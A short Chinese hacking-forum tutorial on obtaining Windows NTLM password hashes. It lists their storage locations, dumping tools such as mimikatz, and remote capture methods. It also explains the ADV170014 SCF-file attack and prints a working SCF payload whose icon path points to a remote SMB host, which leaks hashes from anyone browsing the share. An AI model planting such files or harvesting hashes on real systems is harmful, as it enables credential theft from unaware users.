標題:獲取NTLM

taibeihacker

Moderator

获取 NTLM​

1 相关背景​

1.1 NTLM 的存储位置:​

1、系統數據庫SAM (Security Account Manager)
2、DIT 數據庫
3、內存Cache

1.2 NTLM 的获取方式​

1、從SAM 獲取
2、內存獲取
3、DIT 數據庫獲取
4、WCE、PWDUMP、MIMIKATZ…

1.3 NTLM 的形式​

aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
LMHash (windows 2008 R2系統以後系統默認不保存LMHash)
NTHash
NetHash - 主要獲取該種hash

1.4 远程获取方式(窃取):​

1、Responder
2、HTTP + SMB
3、SCF + SMB4、SQL + SMB

ADV 170014 NTLM SSO​

2017 年10 月,微軟在周二補丁日公佈了一份安全公告(ADV170014),這份安全公告中提到了NTLM 身份驗證方案中的一個漏洞,惡意攻擊者可以利用這個漏洞來竊取哈希。
攻擊者只需要將一個惡意的SCF 文件放置在可公開訪問的Windows 文件夾中即可。
一旦文件被放在文件夾中,就會被一個神秘的bug 執行。它會收集目標的NTLM 密碼散列,並將其發送到一個配置服務器中。
目標主機存在沒有設置密碼保護的一個共享文件夾,這種場景非常常見,比如辦公室、學校、醫院以及大多數Windows 環境中,人們都會通過共享文件夾來共享音樂、照片以及文檔。

攻击场景​

20200509105732.png-water_print

非正版系統可能沒有該設置:
20200509105840.png-water_print

微軟在Windows 3.11 時引入了SCF 文件。 SCF文件其實是純文本文件,可以用來指導Windows 文件資源管理器執行一些基本任務。
1
2
3
4
5
[Shell]
Command=2
IconFile=\\192.168.1.2\sharetest.ico
[Taskbar]
Command=ToggleDesktop
20200509110136.png-water_print
 
返回
上方